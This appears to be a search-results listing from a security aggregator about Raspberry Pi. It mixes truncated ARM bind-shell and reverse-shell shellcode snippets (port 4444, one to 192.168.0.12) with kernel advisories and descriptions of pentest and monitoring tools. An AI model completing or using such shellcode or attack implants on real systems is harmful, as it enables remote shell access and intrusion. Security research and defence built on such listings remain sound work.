1156 matches found
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)
Linux/ARM Raspberry Pi - Bind TCP 0.0.0.0:4444/TCP Shell /bin/sh + Null-Free Shellcode 112 bytes. Shellcode exploit for ARM platform .section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mo...
USN-3523-3: Linux kernel (Raspberry Pi 2) vulnerabilities
Jann Horn discovered that the Berkeley Packet Filter BPF implementation in the Linux kernel did not properly check the relationship between pointer values and the BPF stack. A local attacker could use this to cause a denial of service system crash or possibly execute arbitrary code. CVE-2017-1786...
HouseProxy - HTTP proxy focused on block phishing URL's
Protect your parents from phishing, HTTP proxy focused on block phishing URL's Install git clone https://github.com/mthbernardes/HouseProxy.git cd HouseProxy/ pip install -r requeriments.txt Config Edit etc/HouseProxy.conf to change de default user and password Create a entry in your DNS to...
FruityWifi: An Open Source Wireless Network Auditor
PenTestIT RSS Feed Continuing with my current interest with Raspberry Pi based security tools again. My last post was about P4wnP1. This post is about FruityWiFi an open source tool that helps you with wireless network auditing. What is FruityWifi? FruityWifi is an open source tool based on WiFi...
P4wnP1: A Open Source USB Attack Platform
PenTestIT RSS Feed As of now, hardware security projects seem to be attracting me more than software based projects. Evidently, I wrote a few posts covering them - List of Portable Hardware Devices for Penetration Testing, List of Raspberry Pi DIY Projects for Anonymity, etc. among other awesome...
Wireless Monitoring, Intrusion Detection & Forensics: Nzyme
Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog Open Source log management setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode. Think about this like a long-term months or years...
UPDATE: WarBerryPi Version 5.1b!
PenTestIT RSS Feed My last post pertaining to this Red Teaming Hardware Implant was about an updated version. This post also covers the changes made to two versions since my last post about the WarBerryPi v5. We now have an updated release for the Raspberry Pi based hardware implant allowing you ...
Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3419-1) (BlueBorne)
It was discovered that a buffer overflow existed in the Bluetooth stack of the Linux kernel when handling L2CAP configuration responses. A physically proximate attacker could use this to cause a denial of service system crash. CVE-2017-1000251 It was discovered that a buffer overflow existed in t...
Securing a Raspberry Pi
A Raspberry Pi is a tiny computer designed for makers and all sorts of Internet-of-Things types of projects. Make magazine has an article about securing it. Reading it, I am struck by how much work it is to secure. I fear that this is beyond the capabilities of most tinkerers, and the result will...
List of Portable Hardware Devices for Penetration Testing
PenTestIT RSS Feed All of us at some point or the other think of a possibility of "remoting" a penetration test. Five years ago, you would have to engineer something like this for to suit your own requirements. However now, there are commercial tools already available that help you do that and mu...
Raspberry Pi: Learn How to Build Amazing IoT & Robotics Projects at Home
Do you want to make your own robot at home? But, of course, one can not spend hundreds or thousands of dollars, and definitely would not be able to join a 4-year-long engineering institute to learn how to do it? Well, we have good news for you—Try the Raspberry Pi board to create amazing projects...
Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)
/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...
Linux/ARM (Raspberry Pi) - Reverse TCP Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 ip:192.168.0.12 .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...
Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM Raspberry Pi - Bind TCP Shell 4444/TCP Shellcode 192 bytes. Shellcode exploit for ARM platform / Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3...
Linux/ARM (Raspberry Pi) - Reverse TCP Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Linux/ARM Raspberry Pi - Reverse TCP Shell 192.168.0.12:4444/TCP Shellcode 160 bytes. Shellcode exploit for ARM platform / Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment:...
SweetSecurity - Network Security Monitoring on Raspberry Pi type devices
Scripts to setup and install Bro IDS, Elasticsearch, Logstash, Kibana, and Critical Stack on any device. Getting Sweet Security Either download the Github repository manually, or clone the repo with the following command: $ git clone https://github.com/travisfsmith/sweetsecurity Prerequisites Mos...
Highly Customizable Raspberry Pi USB Attack Platform: P4wnP1
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W required for HID backdoor. Introduction the Windows LockPicker unlock Windows boxes with weak passwords, fully automated by attaching P4wnP1 the HID covert channel backdoor Get remote...
USN-3385-1: Linux kernel vulnerabilities
Andrey Konovalov discovered a race condition in the UDP Fragmentation Offload UFO code in the Linux kernel. A local attacker could use this to cause a denial of service or execute arbitrary code. CVE-2017-1000112 Andrey Konovalov discovered a race condition in AFPACKET socket option handling code...